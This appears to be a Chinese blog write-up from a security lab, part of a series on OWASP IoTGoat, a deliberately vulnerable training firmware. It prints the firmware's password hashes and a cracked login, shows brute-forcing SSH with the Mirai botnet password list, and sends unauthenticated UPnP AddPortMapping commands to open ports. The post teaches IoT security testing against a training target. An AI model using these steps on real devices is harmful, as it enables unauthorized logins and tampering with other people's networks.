系列|OWASP IoTGoat固件漏洞挖掘 02

  • A+
所属分类:CTF专场

    继续接着上一章,本章节主要从弱、可猜测或硬编码的密码和不安全的网络服务入手。



1. 弱、可猜测或硬编码的密码

查看固件中用户密码文件/etc/shadow

root:$1$Jl7H1VOG$Wgw2F/C.nLNTC.4pwDa4H1:18145:0:99999:7:::
daemon:*:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::
dnsmasq:x:0:0:99999:7:::
dnsmasq:x:0:0:99999:7:::
iotgoatuser:$1$79bz0K8z$Ii6Q/if83F1QodGmkb4Ah.:18145:0:99999:7:::
加密密码格式 $id$salt$encrypted

id为1时,采用md5进行加密;

id为5时,采用SHA256进行加密;

id为6时,采用SHA512进行加密;

该固件使用的加密方式为md5加密;

可以采用暴力破解方式获取默认凭证;

查找网上暴力破解字典
$ git clone git://github.com/danielmiessler/SecLists.git
$ cd Malware
$ awk '{print $2}' mirai-botnet.txt > /home/iot/Desktop/password.txt
系列|OWASP IoTGoat固件漏洞挖掘 02



2.  不安全的网络服务

快速端口扫描(速度较快,但不一定准确)
系列|OWASP IoTGoat固件漏洞挖掘 02


22 端口 根据暴力破解得到的密码进行登录
53 端口 dnsmasq安全漏洞
5000 端口upnp允许未经授权的设备修改网络配置

 ① SSH服务


使用僵尸网络字典暴力破解
系列|OWASP IoTGoat固件漏洞挖掘 02

获取用户密码(iotgoatuser/7ujMko0vizxv)

 ② MiniUPnPd服务


扫描upnp详细信息
系列|OWASP IoTGoat固件漏洞挖掘 02


https://zhuanlan.zhihu.com/p/51562785攻击利用方式详细介绍
UPnP由于设计上的缺陷而产生的漏洞,这些其中大多数漏洞是由于服务配置错误或实施不当造成的

2.1  获得SCPD(服务控制协议文档)

查看开启了那些服务
系列|OWASP IoTGoat固件漏洞挖掘 02
系列|OWASP IoTGoat固件漏洞挖掘 02
开启服务汇总
<serviceType>urn:schemas-upnp-org:service:Layer3Forwarding:1</serviceType>
<serviceId>urn:upnp-org:serviceId:L3Forwarding1</serviceId>
<SCPDURL>/L3F.xml</SCPDURL>
<controlURL>/ctl/L3F</controlURL>
<eventSubURL>/evt/L3F</eventSubURL>

<serviceType>urn:schemas-upnp-org:service:DeviceProtection:1</serviceType>
<serviceId>urn:upnp-org:serviceId:DeviceProtection1</serviceId>
<SCPDURL>/DP.xml</SCPDURL>
<controlURL>/ctl/DP</controlURL>
<eventSubURL>/evt/DP</eventSubURL>

<serviceType>urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1</serviceType>
<serviceId>urn:upnp-org:serviceId:WANCommonIFC1</serviceId>
<SCPDURL>/WANCfg.xml</SCPDURL>
<controlURL>/ctl/CmnIfCfg</controlURL>
<eventSubURL>/evt/CmnIfCfg</eventSubURL>

<serviceType>urn:schemas-upnp-org:service:WANIPConnection:2</serviceType>
<serviceId>urn:upnp-org:serviceId:WANIPConn1</serviceId>
<SCPDURL>/WANIPCn.xml</SCPDURL>
<controlURL>/ctl/IPConn</controlURL>
<eventSubURL>/evt/IPConn</eventSubURL>

<serviceType>urn:schemas-upnp-org:service:WANIPv6FirewallControl:1</serviceType>
<serviceId>urn:upnp-org:serviceId:WANIPv6Firewall1</serviceId>
<SCPDURL>/WANIP6FC.xml</SCPDURL>
<controlURL>/ctl/IP6FCtl</controlURL>
<eventSubURL>/evt/IP6FCtl</eventSubURL
    xml还包含ControlURL,这是与该特定服务进行通信的SOAP端点(实质上,该URL的GET / POST将触发操作)。

    SOAP
    
    控制消息使用SOAP协议,也以xml表示,看起来和RPC类似(但没有任何身份验证),即通告SOAP来实现服务操作。


2.2 SOAP控制


    浏览器直接访问控制URL,出现如下报错
系列|OWASP IoTGoat固件漏洞挖掘 02
    查看具体action和对应参数(以DP.xml)
系列|OWASP IoTGoat固件漏洞挖掘 02
    工具miranda
    
    路由器80端口的服务映射到外网端口8080上
upnp> host send 0 WANConnectionDevice WANIPConnection AddPortMapping
系列|OWASP IoTGoat固件漏洞挖掘 02
    获取端口映射目录
upnp> host send 0 WANConnectionDevice WANIPConnection GetSpecificPortMappingEntry
系列|OWASP IoTGoat固件漏洞挖掘 02
    无需认证就可以完成上述操作

    查看网页端口是否添加成功以及是否映射成功

  • 是否添加成功

系列|OWASP IoTGoat固件漏洞挖掘 02
  • 是否映射成功

系列|OWASP IoTGoat固件漏洞挖掘 02
其余的控制URL,大家可以自己去尝试,看会发生什么样的结果。



总结

1.  脆弱的 miniupnp 配置允许未经授权的设备修改网络配置,例如防火墙规则、端口映射。
2.  启动时侦听的传统网络服务。


系列|OWASP IoTGoat固件漏洞挖掘 02
如果您有意向加入我们,请留言: ),
或邮件投递简历:[email protected]





本文始发于微信公众号(山石网科安全技术研究院):系列|OWASP IoTGoat固件漏洞挖掘 02

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: